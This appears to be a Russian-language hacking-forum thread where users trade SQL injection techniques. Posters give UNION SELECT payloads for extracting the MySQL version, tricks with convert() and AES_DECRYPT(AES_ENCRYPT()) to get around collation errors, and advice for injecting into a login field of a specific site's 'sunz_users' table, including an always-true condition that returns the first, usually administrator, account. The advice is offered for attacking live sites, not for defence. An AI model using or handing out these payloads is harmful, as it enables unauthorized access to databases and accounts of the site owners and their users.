Да знаю я что это blind Просто я ниразу с мускулем третим не работал и все пишут уже с union, а в третем просто нету его. Вообще жесть blind sql inj на mysql 3.x кошмар просто

To PSIH: Спасибо за линк чтото на подобие этого я и искал.

Как обойти?

Добавлено:

При запросе ...?id=-1+union+select+1,2,3
вывод есть, а при
При запросе ...?id=-1+union+select+1,version(),3
выводится хрень выше

Используй convert()

convert(version()+using+???) ?

version() using latin1 - попробуй так

union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version() , 0x71),0x71)

__________________

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

Здравствуйте я полохо знаю sql так что заранее спасибо.
У меня такой вопрос если в поле аутентификации я ввожу например 99 и ' и сервер мне выдает
E_DB_QUERY
SELECT * FROM `sunz_users` WHERE `login` = '99'' LIMIT 1;
Могу я что нить отсюда выудить

запрос вида
?login=-1'+union+select+someshit+from+sometable/*
поможет)
имена таблиц и столбцов надо подбирать.

а зачем?

просто ввести в поле
и все...

запрос который выполнится будетдругими словами выбрать все данные из таблицы `sunz_users` там где поле login = 1 или если 1=1, а т.к. 1 всегда равно 1 то благодаря limit 1 запрос выбирает из таблицы первые записи (обычно админские) кстати limit 1 необязательно

__________________
Карфаген должен быть разрушен...